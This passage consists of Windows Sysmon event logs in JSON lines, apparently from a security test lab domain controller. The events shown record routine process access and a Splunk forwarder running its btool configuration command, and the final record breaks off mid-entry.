{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3099,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.015\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.015","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3100,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.031\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00100B4C0500}\r\nTargetProcessId: 4484\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.031","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00100B4C0500}","TargetProcessId":"4484","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3101,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.034\r\nProcessGuid: {41C8662E-1FF3-5F25-0000-0010C14C0500}\r\nProcessId: 4456\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00100B4C0500}\r\nParentProcessId: 4484\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.034","ProcessGuid":"{41C8662E-1FF3-5F25-0000-0010C14C0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00100B4C0500}","ParentProcessId":"4484","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3102,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.031\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00100B4C0500}\r\nSourceProcessId: 4484\r\nSourceThreadId: 4452\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010C14C0500}\r\nTargetProcessId: 4456\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.031","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00100B4C0500}","SourceProcessId":"4484","SourceThreadId":"4452","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010C14C0500}","TargetProcessId":"4456","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3103,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.031\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010C14C0500}\r\nTargetProcessId: 4456\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.031","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010C14C0500}","TargetProcessId":"4456","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3104,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.031\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.031","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3105,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.031\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.031","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3106,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.031\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.031","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3107,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.031\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.031","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3108,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.031\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 